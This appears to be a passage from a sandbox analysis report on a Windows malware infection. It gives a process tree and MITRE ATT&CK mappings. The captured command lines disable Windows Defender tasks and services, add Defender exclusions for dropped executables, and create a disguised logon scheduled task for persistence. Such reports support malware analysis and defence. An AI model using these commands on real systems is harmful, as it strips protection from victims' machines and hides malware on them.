        System Location Discovery: System Language Discovery
        
        PID:3496
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1712
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:780
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1428
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:552
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
        5⤵
        
        PID:444
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
        6⤵
        
        PID:228
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:704
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
        6⤵
        
        PID:892
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5080
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:960
      - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:904
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3772
      - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3516
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3572
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2156
      - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
        6⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:5100
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2632
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4484
      - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
        6⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:4456
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4804
      - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
        6⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:540
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
        5⤵
        
        PID:4668
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
        6⤵
        Modifies Security services
        
        PID:2380
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4416
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f
        6⤵
        
        PID:3272
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2340
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4940
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
        6⤵
        Modifies Security services
        System Location Discovery: System Language Discovery
        
        PID:672
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3788
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3552
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
        6⤵
        Modifies Security services
        System Location Discovery: System Language Discovery
        
        PID:3232
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4612
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
        6⤵
        Modifies Security services
        System Location Discovery: System Language Discovery
        
        PID:552
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3660
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
        6⤵
        Modifies security service
        System Location Discovery: System Language Discovery
        
        PID:5020
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3140 -s 1284
        5⤵
        Program crash
        
        PID:4304
  - - C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\LoadNew.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\LoadNew.exe"
      4⤵
      Executes dropped EXE
      PID:4716
  - - C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\taskhost.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\taskhost.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:2208
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\taskhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2152
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2088
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3980
  - - C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\mobiletrans.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\mobiletrans.exe"
      4⤵
      Executes dropped EXE
      PID:4304
  - - C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\XClient.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\XClient.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:612
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\XClient.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5020
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3460
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5008
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2096
  - - C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\newfile.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\newfile.exe"
      4⤵
      Executes dropped EXE
      PID:228
- C:\Users\Admin\AppData\Local\Temp\DAB0.tmp.zx.exe
  "C:\Users\Admin\AppData\Local\Temp\DAB0.tmp.zx.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1168
- - C:\Users\Admin\AppData\Local\Temp\DAB0.tmp.zx.exe
    "C:\Users\Admin\AppData\Local\Temp\DAB0.tmp.zx.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2056
- C:\Users\Admin\AppData\Local\Temp\DE2C.tmp.x.exe
  "C:\Users\Admin\AppData\Local\Temp\DE2C.tmp.x.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1752
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
  2⤵
  PID:4720
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2392
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:3144
- C:\Windows\System32\dwm.exe
  C:\Windows\System32\dwm.exe
  2⤵
  - Suspicious use of FindShellTrayWindow
  PID:2312
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5268
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
  2⤵
  PID:5304

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3140 -ip 3140
1⤵
PID:4468

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3993055 /state1:0x41c64e6d
1⤵
PID:2568

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

System Information Discovery